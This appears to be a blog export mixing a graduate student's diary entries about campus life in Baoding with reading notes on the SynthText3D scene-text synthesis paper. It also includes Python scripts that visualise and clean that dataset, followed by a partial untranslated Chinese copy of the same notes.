5. Electric bicycles shall be charged only in the designated areas; electric bicycles and their batteries are strictly forbidden in dormitories, teaching buildings, office buildings, laboratories, and similar premises. Violations, once discovered, will result in impoundment of the vehicle and the responsible person being dealt with severely under the relevant rules.

6. Where improper use of an electric bicycle on campus leads to a safety incident or major consequences, the university will work with law enforcement to pursue the responsibility of those involved in accordance with laws and regulations.

7. All units shall educate their personnel in the laws, regulations, and campus rules, advocate safe, civilised, and green travel, guide faculty, staff, and students to obey the rules and raise their safety awareness, and at the same time strengthen patrols and inspections, promptly detect and handle violations, and actively help implement these management measures, so as to truly safeguard the lives and property of themselves and others.

This notice is hereby given.

Security Office

August 31, 2023

冀大 is cracking down on e-bikes. They have even posted a pack of watchdogs to keep students from riding into the teaching-building area. The background: 冀大 has no e-bike charging posts, so students usually pull the battery out and charge it indoors, which would be a real disaster if anything went wrong. So the clever leadership decided to spend money on charging posts while restricting how e-bikes may be used, so that riding one feels difficult and tiresome, students gradually give up riding, and the e-bike ban is achieved! Truly ingenious! Greeted by a chorus of cursing from the students below!

Before leaving I had parked my e-bike under the department building; parking there is no longer allowed, so first I have to ride it back to the dorm 😅. While I'm at it, I'll give the Taiwan specialities I bought to my labmates.

Luckily the flood didn't wreck the e-bike and it still runs. These days I don't much feel like riding it; I'll watch and wait, and start riding again once the storm blows over.


Notice

The bathhouse in this building is under renovation from today; the work is planned to take 12 days. During construction, please use the bathhouses at 德新 1 and the north entrance of 德新 7.
The 德新 7 north-entrance bathhouse keeps campus-card billing; 德新 1 runs on the "智慧笑联" platform, and the instructions posted in the building explain how to use it.
Please pass this on to one another. We apologise for the inconvenience!

September 3, 2023

冀大 is overhauling the bathhouses too.

Apparently the bathhouse under my dorm had been usable the whole time, but renovation started on my very first day back at 冀大. Just why 😅.

In the end it took me forever to find the bathhouse at 德新 7.

So the moment I arrive, my dorm's bathhouse goes under renovation
Which makes showering a hassle
Truly idiotic
The worst part is all the back and forth
You might as well not have showered
They could have renovated earlier
But no, they wait for term to start to fix this one thing

Arrival thus came with two fresh idiocies, the e-bike crackdown and the bathhouse renovation, but my expectations of 冀大 were already low enough that it didn't hurt much.

Having woken in the middle of the night to catch the flight, I had gone a long time without sleep, so I went to bed very early 🥱.

9.4

jpg

The parasol tree and the ginkgo

冀大's famous sight: Ginkgo Avenue.

An idea I've had for a while: take a photo from the same viewpoint on Ginkgo Avenue every day, and after long enough, stringing the photos together would vividly show how Baoding's autumn and winter climate changes 😀.

I've even picked the viewpoint: right in front of a broken floor tile in the middle of the avenue. Here's hoping 冀大 never gets around to fixing that tile 😅.


jpg

Brann Bronzebeard
A screen that bright is clearly serious business
6
You're here early

Got to the lab; it's mostly third-years, so it's sparsely populated and nice and quiet. Thumbs up!


Apparently the typhoon flooding in Fujian is very bad. This year's typhoons really are something: many and fierce.

jpg

Xiamen's "Huli" district (now literally "in the lake")
Good grief
Fleeing Fujian at top speed
Xiamen is under water
关某 got out just in time
A hair's breadth from being stuck

Ran into 伟哥 at the bathhouse in the evening, of all things.

Did you watch 伟哥 shower

My rough daily timeline:

• Wake at some random moment between 6:00 and 7:00
• In the lab by 6:30-7:30
• Off to the canteen at some random time between 10:30 and 11:00
• Lunch around 11:00, then back to the dorm to flop
• Up between 12:30 and 14:00, back to the lab
• Canteen again at some random time between 16:30 and 17:00
• 17:00-19:00: dinner, shower, laundry, flopping, the full package
• 19:00-19:30 back to the lab
• 21:30-22:00 back to the dorm, wash up, flop

Since 冀大's bathhouse and canteen capacity is genuinely limited, I go at off-peak times to dodge the crowds, and by now I'm used to it.

Probably from being apart so long, my roommates and I have grown distant; I feel no urge to join their gaming, group dinners, or gym runs. After everything that has happened here, any sense of belonging is long gone; once the paper is out I'm off. Sometimes I enjoy being alone and undisturbed, and sometimes it gets lonely.

9.5

jpg

万佛寺 (Wanfo Temple)

Xiamen floods, Xiamen floods; once Xiamen is done, Fuzhou floods.


林徽因 said: "Marry or don't marry, you will regret it either way. The cat in the alley is free but has no home; the dog inside the wall has a home but must bow its head all its life. However you answer this multiple-choice question of life, something will be left to regret.

But remember: however you choose, make a living before you make love, and love yourself before you love another. Having no means of your own is the one true abyss." For you, right now, the thesis and English are the main job; push on those, and the rest will fall into place.

9.6

jpg

Quack quack quack

Checking in on the ducks in front of the library.


jpg

Scored a stall

The 德新 7 bathhouse is going under renovation too, so that trip was wasted. Tried 德新 1: the new bathhouse has stalls, not bad! Having to scan a code with the phone is a little annoying though.

9.7

@everyone Meeting tonight (Thursday) at 7 in 326; please attend on time.

The long-dormant group meeting is finally happening! Mostly everyone reported their paper progress; apart from 牛伟 and 牛凡, nobody's progress looked great 😅. 杰哥 said his experiments can't proceed for lack of compute and he has to change direction. Again the sigh: whether a paper gets published isn't entirely up to you; some of the resources are just that bad. 冀大, you pauper.

9.8

I'd love to record something, but I was in the lab all day and there's nothing to record.

9.9

Rain in Baoding again; slightly cool, but northern buildings hold heat so well that it's still shorts-and-T-shirt weather 😅.


9:45 a.m., academic talk in C1-535; arrive 10 minutes early to sign in. @everyone
To skip the talk you need a leave slip from 温老师, signed by your supervisor (scholarship season, so no sneaking off).

Another seat-filling rally. Just why.

I brought a pillow in the morning to keep up appearances. In the afternoon I simply skipped it; I'm done playing along, 冀大, goodbye.

9.10

Happy Teachers' Day!
Thank you all! Very happy!

For Teachers' Day the senior student wanted to send something, but the group chat was so awkward that nobody picked up the thread and in the end nothing was sent 😅. We thought of treating our supervisor to dinner, but she was busy, so that fell through too. The senior next door bought a big fruit basket, and their supervisor declined it and split it among us.

9.11

小迷糊 found a new job in Beijing. Congratulations, 小迷糊!

9.12

I'd love to record something, but I was in the lab all day and there's nothing to record.

9.13

I'd love to record something, but I was in the lab all day and there's nothing to record.

9.14

Group meeting Thursday at 7 p.m. in 326; content to be prepared by 杰哥 @杰哥

Group meeting again.

Our group meetings have a fairly light mood, which is nice.

Thanks to my supervisor for having no ambitions about her title, letting us paper-padders hurry up, squeeze out our papers, and run. Not my race track; I'm done grinding.

9.15

~~I'd love to record something, but I was in the lab all day and there's nothing to record.~~ I felt genuinely worn out in the afternoon, so I lay about in the dorm, tidied the room while I was at it, and tidied out one big heap 😅.

jpg

One big heap

The bathhouse renovation is finally finished; no more fighting over stalls.

9.16

Another day of debugging code; I got so into it that I skipped the midday nap.

Trying to reproduce a CCF-A paper, and the longer I reproduce it the more I suspect the authors of academic fraud 😅. Tossing the raw data into the furnace blew the furnace up outright; after ages of data washing it barely runs, and the results are nowhere near as good as they brag.

A few days ago my supervisor sighed at group meeting that CS students only want to write code and their paper writing is a mess. This paper's writing swaggers and its dataset is the mess. The CS academic world really is a fog of smoke; it's all formalism, of no use whatsoever, the state spending so much money to raise a pile of rubbish. If 北大 can get two CCF-A's out of this, surely 冀大 can squeeze out one CCF-C!

9.17

Another night too hot to sleep; at the same temperature Baoding feels much hotter than Fuzhou. So I slacked off again in the afternoon.

    ]]>
@@ -5067,7 +5067,7 @@ /posts/Paper-SynthText3D-Synthesizing%20Scene%20Text%20Images%20from%203D%20Virtual%20Worlds/ - Resources

Full text

Abstract

A method for synthesising scene text images with a 3D graphics engine.

1. Introduction

• Annotating data is slow; synthesising data is fast, and free of human error.

• Surveys earlier scene-text image synthesis methods.

• Argues that pasting text into static 2D background images always falls a bit short.

• Proposes SynthText3D, an image synthesis engine that exploits 3D information:

  • Text instances in various fonts are first embedded at suitable locations in a 3D virtual world.
  • Virtual scenes containing text instances under various lighting conditions and degrees of visibility are rendered in the 3D virtual world, with text and scene rendered as a whole.
  • Finally, cameras are set at different positions and orientations so that the projected 2D text images cover diverse viewpoints.

• Advantages the authors claim for SynthText3D:

  • Text and scene are rendered as one whole in the 3D virtual world, which makes illumination/visibility, perspective transformation, and occlusion simulation more realistic.
  • Accurate surface normal information comes straight from the engine, which helps find suitable regions for placing text instances.
  • SynthText3D can generate text instances with different viewpoints, different illumination, and different visibility, similar to how the human eye observes.

• Contributions:

  • The first to synthesise a scene-text dataset from a 3D engine.
  • Killer visual quality: complex perspective transformations, varied lighting, and occlusion.
  • Experiments show it works.

2.1. Synthetic Data for Scene Text

A tour of prior work:

• Synth90K contains only cropped local regions and cannot be used directly for text detection.
• The famous SynthText…

None of these methods render from a 3D virtual world.

2.2. Image Synthesis in 3D Virtual Worlds

Application areas include:

• Human pose estimation
• Indoor scene understanding
• Object detection

Uses of 3D models:

• Rendering 3D objects onto static real background images.
• Randomly arranging scenes full of objects.
• Using commercial game engines:
  • GTA
  • Unreal

2.3. Scene Text Detection

A quick introduction to scene text detection (STD):

• Top-down methods.
• Treating scene text as a generic object within generic object-detection frameworks.

3. Methodology

3.1. Overview

Built on UE4 with the UnrealCV plugin.

9 3D scene models:

• 5 indoor models
• 4 outdoor models

jpg

The pipeline of SynthText3D:
• camera anchor generation module
• text region generation module
• text generation module
• 3D rendering module

Steps:

• Manually initialise a small set of camera anchors for each 3D model.

• Obtain an RGB image and an accurate surface normal map from the 3D engine for every camera anchor.

• Generate the available text regions based on the surface normal map.

• Randomly pick a few of the available text regions and generate text with random fonts, content, and writing structure according to the region size (the text colour of a chosen region is derived from the background RGB image of that region).

• Map the 2D text regions into the 3D virtual world and place the corresponding text there.

3.2. Camera Anchor Generation

• Manual inspection, or an annotated dataset, is used to discard background images that already contain text.

• A small set of camera viewpoints (roughly 20 to 30 per 3D model) is built inside the virtual scenes and treated as the initial anchors. During collection an operator steers the camera through the scene and picks views that suit text placement.

• Camera anchors follow one simple rule: the view must contain at least one suitable region. Human-guided anchor generation weeds out unreasonable anchors, e.g. ones inside objects or in dim light.

3.3. Text Region Generation

Given a camera anchor, we obtain the visible part of the 3D scene, including the view's RGB image, depth image, and surface normal map.

Here, text region generation is based on the surface normal map. The surface normal at a coordinate point of the 3D virtual world is defined as the unit vector perpendicular to the tangent plane of the surface at that point.

3.3.1 Normal Boundary Map

Earlier work used gPb-UCM segmentation to find suitable text regions, or model-estimated saliency maps together with ground-truth semantic maps to extract suitable embedding locations.

But with a 3D engine, accurate depth and normal maps come for free.

A simple transformation turns the surface normal map into a normal boundary map:

$$\begin{align}
B_{i,j} =
\begin{cases}
1, & \max\left(|N_{i,j}-N^{0}_{i,j}|,\dots,|N_{i,j}-N^{k}_{i,j}|\right) > t, \\
0, & \text{otherwise},
\end{cases}
\end{align}$$

• $t$ is set to 100 and is the threshold on the $L_1$ difference between a normal vector and its neighbours.

• $B_{i,j}$ is the value of the normal boundary map $B$ at position $(i,j)$, and $N_{i,j}$ is the normal vector there.

• $\{N^{0}_{i,j},\dots,N^{k}_{i,j}\}$ is the set of normal vectors at the 4 neighbouring positions (fewer at image borders).

• $|\cdot|$ is the $L_1$ norm.
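
As a sanity check of the equation, a minimal NumPy sketch of the normal boundary map; `normals` is assumed to be an H×W×3 array of engine normals on the same scale as the paper's threshold, and this is my own illustration, not the authors' code:

import numpy as np

def normal_boundary_map(normals, t=100):
    # L1 difference between each pixel's normal and its 4-neighbourhood.
    # np.roll wraps at the borders, which the paper instead excludes;
    # good enough for a sketch.
    H, W, _ = normals.shape
    B = np.zeros((H, W), dtype=np.uint8)
    for di, dj in [(-1, 0), (1, 0), (0, -1), (0, 1)]:
        shifted = np.roll(normals, (di, dj), axis=(0, 1))
        diff = np.abs(normals - shifted).sum(axis=2)  # per-pixel L1 norm
        B = np.maximum(B, (diff > t).astype(np.uint8))
    return B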

jpg

Illustration of text region generation:
(a) original image
(b) surface normal map
(c) normal boundary map
(d) and (e) generated text regions

Randomised binary search

To extract all available text regions exhaustively, an initial grid of candidate regions is laid over the image, inspired by anchor-based object detectors.

At each initial position we start from an initial rectangular bounding box just big enough to hold text, set to 32×64 pixels. The stride of the initial boxes is chosen at random from (12; 24; 36). To retrieve the largest area, a randomised binary search is proposed.

At each search step, one side of the rectangle is expanded at random. The expansion follows the rules of binary search (see the sketch after this list):

• The lower bound is set to the current edge position and the upper bound to the corresponding image border. If the expanded rectangle crosses no normal boundary, the lower bound is updated to the midpoint;
• otherwise the upper bound is updated to the midpoint. The algorithm converges when upper and lower bounds coincide for every side.
• After boxes are generated at all anchors, each box is checked one by one in random order and discarded if it overlaps any other box.
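
A sketch of one expansion step for the right edge, under the assumption that "crossing a normal boundary" can be tested by summing the boundary map inside the candidate box; `boundary` is the binary map from the sketch above, and the helper name is mine, not the paper's:

import random

def expand_right_edge(boundary, top, left, bottom, right):
    # Binary search for how far the right edge can move without the box
    # crossing a normal boundary. lo/hi are the lower and upper bounds.
    lo, hi = right, boundary.shape[1]
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if boundary[top:bottom, left:mid].sum() == 0:
            lo = mid      # no boundary crossed: raise the lower bound
        else:
            hi = mid - 1  # boundary crossed: lower the upper bound
    return lo

# One randomised step, per the paper: pick a side at random and expand it.
side = random.choice(["top", "left", "bottom", "right"])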

3.4. Text Generation

After the text regions are generated, a few of the available regions are sampled at random for text rendering. Given a text region and its RGB image, the text generation module samples text content with a particular appearance, including font and text colour. For a fair comparison with SynthText, the same text source is used, which comes from the Newsgroup 20 dataset.

Text content is sampled at random from the text source in three structures: words, lines (up to 3), and paragraphs.

Fonts are sampled at random from Google Fonts to generate the text's texture. Text colour is decided by the region's background, using the same palette model as SynthText. The texture and colour of every region are fed to the 3D rendering module to perform the rendering.

3.5 3D Rendering

3D rendering consists of two sub-modules:

• the Text Placing Module, which places text into the 3D virtual world;
• the Rendering Module, which performs illumination and visibility adjustment, viewpoint transformation, and occlusion.

3.5.1 Text Placing

By the look of it, the text is stamped onto the image in a 3D fashion based on the 2D normal map.

2D-to-3D Region Projection

A coarse-to-fine strategy projects the 2D text regions into the 3D virtual world.

Suppose $p_j=(x_j,y_j)$ is a coordinate point of the 2D map and $d_j$ is the depth value at $p_j$; then the coarse-grained 3D coordinates $P=(X_j,Y_j,Z_j)$ are computed as

$$\begin{bmatrix} X_j \\ Y_j \\ Z_j \end{bmatrix} = K \times d_j \times \begin{bmatrix} x_j \\ y_j \\ 1 \end{bmatrix}$$

where $K$ is the camera's intrinsic matrix, a property parameter of the camera. A deviation appears between positions at integer depth and positions at floating-point depth.

jpg

Coordinates computed from integer depth versus floating-point depth.
Pv: the viewpoint;
Pi: the point at integer depth;
Pf: the point at floating-point depth.

To obtain fine-grained coordinates, ray casting is used, i.e. the process of deciding whether and where a ray intersects an object. As in the figure above, a ray $V=(P_i-P_v)$ is initialised, where $P_i$ is the coarse point estimated by the equation above. The fine-grained point $P_f$ is then obtained by casting the ray and taking the hit point closest to $P_v$.

Finally, the 3D quadrilateral is refined iteratively so that the final bounding box becomes a 3D axis-aligned bounding box.

Text Deformation

In the wild, not every text region is planar, e.g. the surfaces of bottles and clothes; text has to deform to fit the target surface.

The deformation algorithm works as follows. The text plane is treated as a triangular mesh, with the text as the mesh's texture map. The four corner vertices of the mesh are first pinned to the region corners, then the middle vertices are moved to the nearest positions on the target object's surface. Finally, the texture coordinates of the vertices are estimated from their Euclidean distances to the corner vertices.

jpg

3.5.2 Rendering

Several environment settings are built per scene. Every indoor scene gets three illumination settings: normal, bright, and dark.

Besides illumination, outdoor scenes also get a fog environment.

The rendering process: Demonstration for Paper – SynthText3D: Synthesizing Scene Text Images from 3D Virtual Worlds - YouTube

4. Experiments

Hardware used to synthesise the images:

• i7-8700 CPU
• Nvidia GeForce GTX 1060 GPU
• 16 GB RAM

One image every 2 seconds, at 720 × 1080.

4.1. Datasets

Datasets for evaluation and comparison:

• SynthText: 800K images, of which 10K were sampled at random, called SynthText-10K.
• VISD (10K)
• ICDAR 2013 (229+233)
• ICDAR 2015 (1000+500)
• MLT (ICDAR 2017, 7200+1800+9000)

4.2. Visual Analysis

Two key factors drive the visual quality of synthetic data: suitable text regions, and the rendering effect.

4.2.1 Suitable Text Regions

Here they brag that their text regions are well placed.

4.2.2 Rendering Effect

Here they brag that their rendering looks realistic.

4.3. Scene Text Detection

EAST with a ResNet-50 backbone, 4 GPUs, batch size 56.

4.3.1 Pure Synthetic Data

jpg

Better than SynthText-10K! Even our 10K images beat the full 800K SynthText!

VISD released only the dataset, not the source code. We do worse than it, but still insist that our generated images look more realistic in perspective transformation, varied illumination, and occlusion.

Training on mixed data (our 5K + VISD 5K) works best of all!

4.3.2 Combination of Synthetic Data & Real Data

jpg

Training on synthetic and real data together, the result is still below VISD. So frustrating!

More insisting: VISD uses 10K real-world background images, which supply rich objects and textures, whereas our synthetic images are projected from 3D virtual worlds based on only about 200 camera anchors. That is probably why our improvement is slightly below VISD's.

4.4. Limitations

The main limitation of the method is the manual selection of camera anchors, although that is relatively easy to do since each virtual world needs only about 20-30 anchors. Considering that earlier methods also needed manual inspection or annotation to filter out background images containing text, the manual selection is acceptable. Future work will try to improve this by introducing an algorithm that generates camera anchors automatically.

That should be the next paper.

5. Conclusion

A wrap-up, nothing more.

Code

Dataset visualisation

import numpy as np
import cv2
import os
import matplotlib.pyplot as plt

index = 27

image_dir = r'E:\dataset\Synth3D-10K\img\\'
label_dir = r'E:\dataset\Synth3D-10K\label\\'

image_path = os.path.join(image_dir, str(index) + '.jpg')
label_path = os.path.join(label_dir, str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape

with open(label_path, "r") as file:
    data = file.read()

lines = data.split("\n")  # split the label text into lines
result = []
for line in lines:
    if len(line) > 1:
        values = line.split(",")  # split each line on commas
        result.extend([float(s) for s in values])

# Group the flat coordinate list into quadrilaterals: 4 x values and 4 y values each.
x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

# Draw each quadrilateral and mark its corners.
for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points = np.array([x, y], np.int32).T
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()

png

Manual inspection, though, turns up some images of truly questionable quality. Does this really work?

png

Converting to TotalText format

import numpy as np
import os
from tqdm import tqdm

label_dir = r'E:\dataset\Synth3D-10K\label'
save_dir = r"E:\dataset\Synth3D-10K\Txts"

for index in tqdm(range(1, 10000 + 1)):
    label_path = os.path.join(label_dir, str(index) + '.txt')

    with open(label_path, "r") as file:
        data = file.read()

    lines = data.split("\n")  # split the label text into lines
    result = []
    for line in lines:
        if len(line) > 1:
            values = line.split(",")  # split each line on commas
            result.extend([float(s) for s in values])

    # Group the flat list into quadrilaterals: 4 x values and 4 y values each.
    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

    string = ""

    # Emit one TotalText-style annotation line per quadrilateral.
    for i in range(len(x_list)):
        x = x_list[i]
        y = y_list[i]

        string += 'x: [['
        string += ' '.join(map(str, x))
        string += ']], y: [['
        string += ' '.join(map(str, y))
        string += "]], ornt: [u'h"
        string += "'], transcriptions: [u'"
        string += "#"
        string += "']\n"
    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
        file.write(string)

import os
from tqdm import tqdm

file_dir = r"E:\dataset\Synth3D-10K\Images\\"

# Prefix every image file name with "img" to match the new label names.
for file in tqdm(os.listdir(file_dir)):
    os.rename(os.path.join(file_dir, file), os.path.join(file_dir, "img" + file))

Saving the visualisation results (TotalText format)

import numpy as np
import cv2
import os
from tqdm import tqdm

image_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train\\'
label_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
save_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train3\\'

for index in tqdm(range(1, 10001)):
    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    # Skip indices whose label file is missing.
    try:
        label_file = open(label_path, 'r')
    except OSError:
        continue
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
        # Parse the x/y coordinate lists and the orientation out of the
        # TotalText-style annotation line.
        x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
        y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
        ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]

        points = np.array([x, y], np.int32).T

        cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
        for p in points:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.imwrite(os.path.join(save_dir, str(index) + '.jpg'), image)

Cleaning the data

Sure enough there is far too much bad data; dropped into mindOCR it simply refuses to run, which makes me wonder whether something is off with this paper. It needs a wash:

Remove annotations that are:

• too small

• intersecting

• out of bounds

• malformed

After that it just about runs.

Some of the data is wrong in more complicated ways; oh well, running is good enough.

import numpy as np
import cv2
import os
from shapely.geometry import Polygon


def check_intersection(polygon, polygon_list):
    # True if `polygon` overlaps any *other* polygon in the list.
    for other_polygon in polygon_list:
        if polygon is not other_polygon and polygon.intersects(other_polygon):
            return True
    return False


image_dir = r'F:\dataset\Synth3D-10K\img\\'
label_dir = r'F:\dataset\Synth3D-10K\label\\'
save_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
error_list = []

for index in range(1, 10000 + 1):
    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    with open(label_path, "r") as file:
        data = file.read()

    lines = data.split("\n")  # split the label text into lines
    result = []
    for line in lines:
        if len(line) > 1:
            values = line.split(",")  # split each line on commas
            result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]
    points_list = []
    is_error = False

    # Build all polygons first so intersections can be checked pairwise.
    for i in range(len(x_list)):
        x = x_list[i]
        y = y_list[i]
        points_list.append(Polygon(np.array([x, y], np.int32).T))

    if not is_error:
        string = ""
        for i in range(len(x_list)):
            x = list(map(int, x_list[i]))
            y = list(map(int, y_list[i]))

            polygon = points_list[i]

            if polygon.area < 200:
                is_error = True
                error_list.append(index)
                print(index, "quadrilateral too small", polygon.area)
                continue

            if not (polygon.is_valid and len(polygon.exterior.coords) == 5):
                is_error = True
                error_list.append(index)
                print(index, "not a valid quadrilateral")
                continue

            if min(y) < 0 or min(x) < 0 or max(x) > width or max(y) > height:
                is_error = True
                error_list.append(index)
                print(index, "out of bounds")
                continue

            if check_intersection(polygon, points_list):
                is_error = True
                error_list.append(index)
                print(index, "intersects", polygon.area)
                continue

            string += 'x: [['
            string += ' '.join(map(str, x))
            string += ']], y: [['
            string += ' '.join(map(str, y))
            string += "]], ornt: [u'h"
            string += "'], transcriptions: [u'"
            string += "A"
            string += "']\n"
        if len(string) > 0:
            print("writing", index)
            with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
                file.write(string)
    ]]>
    + 资源

    全文

    Abstract

    ​ 一种用 3D 图形学引擎合成场景文本的方法。

    1. Introduction

    • 数据注释慢慢,合成数据快快,还没有人为错误。

    • 概述了下先前的场景文本图像合成方法。

    • 认为通过将文本插入静态 2D 背景图像总是差点意思。

    • 提出了一种结合 3D 信息的图像合成引擎 SynthText3D

      • 各种字体的文本实例首先被嵌入到 3D 虚拟世界中的适当位置。
      • 在 3D 虚拟世界中渲染包含具有各种照明条件和不同可见性的文本实例的虚拟场景,其中文本和场景被完整地渲染。
      • 最后,我们将相机设置为不同的位置和方向,以使投影的 2D 文本图像处于不同的视点。
    • 笔者认为 SynthText3D 具有的优势:

      • 3D 虚拟世界中的文本和场景被渲染为一个整体,这使得照明/可见性、透视变换和遮挡模拟更加逼真
      • 直接从引擎中获得准确的曲面法线信息,这有利于找到合适的区域来放置文本实例。
      • SynthText3D 可以生成具有不同视角、不同照明和不同可视度的文本实例,这类似于人眼的观察方式
    • 全文贡献:

      • 从 3D 引擎合成场景文本数据集,前无古人
      • 视觉效果牛逼!有复杂的透视变换、各种照明和遮挡。
      • 实验证明好使。

    2.1. Synthetic Data for Scene Text

    ​ 介绍一下前人工作:

    • Synth90K 只有裁剪的局部区域,不能直接用于 Text Detection
    • 大名鼎鼎的 SynthText……

    ​ 这些方法都不是从 3D 虚拟世界里渲染的。

    2.2. Image Synthesis in 3D Virtual Worlds

    ​ 领域有:

    • 人体姿态估计
    • 室内场景理解
    • 物体检测

    ​ 3D 模型的使用:

    • 在静态背景真实图像上渲染 3D 对象。
    • 随机排列充满物体的场景。
    • 使用商业游戏引擎:
      • 给他爱
      • Unreal

    2.3. Scene Text Detection

    ​ 介绍一下 STD。

    • 自上而下的方法。
    • 在通用对象检测的框架上将场景文本视为通用对象。

    3. Methodology

    3.1. Overview

    ​ 基于 UE4 和 UnrealCV 插件。

    ​ 9 个 3D 场景模型:

    • 5 个室内模型
    • 4 个室外模型

    jpg

    The pipeline of SynthText3D.
    • 摄像头锚点生成模块
    • 文本区域生成模块
    • 文字生成模块
    • 3D 渲染模块

    ​ 步骤:

    • 为每个 3D 模型手动初始化少量相机锚点。

    • 从 3D 引擎获得每个相机锚点的 RGB 图像和精确的表面法线图

    • 将基于曲面法线贴图生成可用的文本区域

    • 从所有可用的文本区域中随机选择几个区域,并根据文本区域的大小生成随机字体、文本内容和写作结构的文本(所选择的文本区域的文本颜色是根据相应区域的背景 RGB 图像生成的)

    • 将 2D 文本区域映射到 3D 虚拟世界中,并将相应的文本放置在其中

    3.2. Camera Anchor Generation

    • 手动检查,或者使用带注释的数据集来丢弃包含文本的背景图像。

    • 在虚拟场景中构建了一小组相机视点(每个 3D 模型大约 20 到 30 个),这些视点被视为初始锚点。在收集过程中,操作员控制摄影机在场景中导航,选择适合放置文本的视图。

    • 按照一个简单的规则选择相机锚点:视图中至少存在一个合适的区域。人工引导的摄像机锚点生成可以消除不合理的锚点,例如物体内部或昏暗光线下的锚点。

    3.3. Text Region Generation

    ​ 给定相机锚点,我们可以获得 3D 场景的可见部分,其中包含视图的RGB 图像深度图像曲面法线图

    ​ 这里,文本区域的生成是基于曲面法线贴图的。三维虚拟世界中坐标点的表面法线被定义为垂直于当前坐标点处该表面的切平面的单位向量。

    3.3.1 Normal Boundary Map

    ​ 前人的工作有用 gpb-UCM 分割来获得合适的文本区域,也有用模型估计的显著性图和基本语义事实图来提取合适的文本嵌入位置。

    ​ 但是我们用 3D 引擎,可以直接获得精确的深度图和法线图。

    ​ 使用简单的变换方程从曲面法线贴图生成法线边界图

    $$\begin{align}
    B_{i,j} =
    \begin{cases}
    1, & \max(|N_{i,j}-N0_{i,j}|,…,|N_{i,j}-Nk_{i,j}|) > t, \
    0, & \text{otherwise}.
    \end{cases}
    \end{align}$$

    • $t$ 被设为 100,表示法向量与其相邻向量之间的 $L_1$ 范数差的阈值。

    • $N_{i,j}$ 是法线边界图 $B$ 中的位置 $(i,j)$ 的值。

    • ${N0_{i,j},…,Nk_{i,j}}$ 是 4 个相邻位置(图像的边界位置除外)的一组法向量。

    • $|.|$ 是 $L_1$ 范数。

    jpg

    文本区域生成说明:
    (a) 原始图像
    (b) 曲面法线贴图
    (c) 法线边界图
    (d) 和 (e) 是生成的文本区域

    随机二进制搜索

    ​ 为了彻底提取所有可用的文本区域,我们在图像上设置了一个初始候选区域网格,灵感来自基于锚的对象检测器。

    ​ 在每个初始位置,我们从一个初始矩形边界框开始,该边界框的最小大小足以放置文本,设置为 32×64 像素。初始矩形框的步幅是从(12;24;36)中随机选择的。为了检索最大面积,我们提出了一种随机二进制搜索方法。

    ​ 在每个搜索步骤中,我们随机展开矩形的一侧。展开遵循二进制搜索的规则:

    • 下限被设置为当前边缘位置,上限被设置为图像的相应边缘。如果展开的矩形没有越过法线边界,则下限更新为中点;
    • 否则,将上限更新到中点。当每条边的上界和下界相等时,该算法收敛。
    • 在所有锚处生成框后,我们以随机顺序逐一检查每个框,如果任何框与任何其他框重叠,则将其丢弃。

    3.4. Text Generation

    ​ 生成文本区域后,我们随机抽取几个可用的文本区域进行文本渲染。给定一个文本区域及其 RBG 图像,文本生成模块旨在对具有特定外观的文本内容进行采样,包括字体和文本颜色。为了公平地与 SynthText 进行比较,我们使用了与相关论文相同的文本源,后者来自 Newsgroup 20 数据集。

    ​ 文本内容是从具有三种结构的文本源中随机抽取的,包括单词、行(最多 3 行)和段落。

    ​ 我们从 Google Fonts3 中随机抽取字体样本,用于生成文本的纹理。文本颜色由文本区域的背景决定,使用 SynthText 中相同的调色板模型。每个区域的纹理和颜色将被输入到 3D 渲染模块中,以执行 3D 渲染。

    3.5 3D Rendering

    ​ 三维渲染三维渲染包括两个子模块。

    • 第一个是 Text Placing Module,旨在将文本放置到三维虚拟世界中。
    • 第二个是 Rendering module,其中可以执行照明和可见性调整、视点变换、遮挡。

    3.5.1 Text Placing

    ​ 看样子它是根据 2D 的法线图,用 3D 的方式把文字打在图上的。

    2D-to-3D Region Projection

    ​ 使用从粗到细的策略将 2D 文本区域投影到 3D 虚拟世界中。

